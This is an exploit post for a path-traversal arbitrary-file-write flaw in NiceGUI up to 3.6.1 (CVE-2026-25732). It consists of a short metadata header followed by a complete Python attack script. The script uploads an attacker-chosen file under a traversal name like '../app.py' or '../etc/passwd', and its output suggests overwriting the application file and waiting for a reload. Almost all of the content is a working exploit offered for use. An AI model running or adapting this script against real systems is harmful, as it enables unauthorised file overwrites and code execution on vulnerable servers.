📄 NiceGUI 3.6.1 Path Traversal

# Exploit Title: NiceGUI 3.6.1 - Path Traversal 
    # Author: Mohammed Idrees Banyamer
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Date: 2025-06-06
    # Tested on: NiceGUI <= 3.6.1 (Python 3.8–3.12 on Linux/Windows)
    # CVE: CVE-2026-25732
    #
    # Affected Versions: <= 3.6.1 (fixed in 3.7.0)
    #
    # Type: Remote Arbitrary File Write / Path Traversal
    # Platform: Web Application (Python / NiceGUI)
    # Author Country: Jordan
    # Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
    # Attack Vector: Network
    # Privileges Required: None
    #!/usr/bin/env python3
    """
    CVE-2026-25732 — NiceGUI arbitrary file write (path traversal)
    Exploits unsanitized FileUpload.name when app uses it in save path.
    
    Usage:
      python exploit_cve_2026_25732.py http://target:8080 "../etc/passwd" payload.txt
      python exploit_cve_2026_25732.py http://target:8080 "../app.py" malicious_app.py
    """
    
    import sys
    import requests
    from urllib.parse import urljoin
    from pathlib import Path
    
    def exploit(target_url: str, malicious_filename: str, local_payload_path: str | Path):
        target_url = target_url.rstrip('/') + '/'
    
        try:
            with open(local_payload_path, 'rb') as f:
                payload_bytes = f.read()
        except Exception as e:
            print(f"[-] Cannot read payload file: {e}")
            sys.exit(1)
    
        files = {
            'file': (malicious_filename, payload_bytes, 'application/octet-stream')
        }
    
        print(f"[*] Target       : {target_url}")
        print(f"[*] Malicious name : {malicious_filename}")
        print(f"[*] Payload size   : {len(payload_bytes):,} bytes")
    
        try:
            # NiceGUI upload endpoint is usually the page itself (multipart POST to /)
            r = requests.post(
                target_url,
                files=files,
                timeout=12,
                allow_redirects=False
            )
    
            print(f"[+] Response     : {r.status_code} {r.reason}")
            if r.status_code in (200, 201, 204):
                print("[SUCCESS] Upload accepted — file likely written")
            elif r.status_code == 413:
                print("[!] Payload too large (server limit)")
            elif r.status_code in (400, 403, 422):
                print("[!] Rejected — target may be patched / not vulnerable / wrong endpoint")
            else:
                print("[?] Unexpected response — check manually")
    
            print("\nSnippet of response:")
            print(r.text[:600].replace('\n', ' ').strip() + "..." if len(r.text) > 600 else r.text)
    
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
    
        print("\nNext steps:")
        print(" • Check filesystem on target (if you have access)")
        print(" • If you overwrote app.py / main.py → wait for reload / restart")
        print(" • Try deeper traversal: '../../some/secret/file' etc.")
    
    if __name__ == '__main__':
        if len(sys.argv) != 4:
            print(__doc__)
            sys.exit(1)
    
        target = sys.argv[1]
        dest_filename = sys.argv[2]
        payload_file = sys.argv[3]
    
        exploit(target, dest_filename, payload_file)